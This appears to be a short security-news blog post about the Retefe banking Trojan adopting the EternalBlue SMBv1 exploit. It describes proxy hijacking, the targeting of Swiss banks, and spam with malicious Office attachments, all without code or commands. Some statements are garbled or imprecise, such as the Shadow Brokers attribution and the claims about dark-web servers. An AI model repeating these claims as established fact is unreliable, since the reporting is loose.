Retefe Banking Trojan Adds Support for NSA’s EternalBlue Exploit In Swiss Campaigns


According to the latest information that leaked online by the Shadow Brokers, security researchers observed a new Retefe banking Trojan. The sample of this third banking Trojan has proved that it has implemented EternalBlue which is an exploit created by NSA. This year, in July, first banking Trojans to do so were TrickBot and Emotet. These two trojans uses heavy customizations of EternalBlue exploit to distribute to other PC on same Internal network.

First of all Retefe Got EternalBlue Module on September 5

On September 5th, 2017, the Retefe banking Trojan has used EternalBlue exploit as a part of it’s infection. The purpose of this banking Trojan is same to the other traditional Trojan. It allows cyber attackers to extend the initial System infection to other System which expose an outdated SMBv1 services. Just like with TrickBot and Emotet, Retefe banking trojan seems to have altered PoC (proof-of-concept) EternalBlue exploit code.

Retefer Uses Proxy Hijacking, TOR and EternalBlue

On seeing Retefe banking Trojan add support for the EternalBlue is really not a surprise. Along with the Qbot, this banking trojan also prefers the small scale attacks compared to massive spam approach. This variant of banking Trojan mainly targets the banks customers in several countries including Sweden, Austria, Japan and Switzerland. There are several characteristics which makes this trojan unique compared to the other banking trojan. It does not use browser hooks to injects the fake login webpages on the top of trusted as well as legitimate websites. This banking Trojan is still active today and infect banks in a wide range. It relies of altering the System’s proxy settings to lead web traffic for the certain sites to clones that hosted on the cyber attackers servers. Most of hackers servers are usually stored on Dark Web.

Retefe Mainly Focus on Swiss Campaigns

Many security analysts has believed that Retefe banking Trojan mainly targeted Swiss banks to make large amounts of money. These banks generally has large businesses and hind end customers. Just because of its more malicious activities in the Switzerland, CERT team has kept an eye on the variants of Retefe. Although, group spreading this trojan since 2013 and continues to improve attacks techniques and vectors. Rather than other banking trojan, Swiss banks mainly targeted with this Trojan with high profile potential. Retefe usually operates by leading web traffic to and from targeted banks through the several proxy servers

In the recent months, Retefe banking trojan has generally spread via malicious spam campaigns that contains MS Office document attachments. Spam attachments generally contains the embedded OLE objects or Package Shell Objects. These attachments also contains the text and an image that encourage innocent user to click on them. When any user open such a dubious attachments or links, it secretly lurks inside the PC without user’s awareness.


[To Delete Emotet or Other Banking Trojan, You May Also Visit, –]

Leave a Comment

Your email address will not be published. Required fields are marked *

Skip to toolbar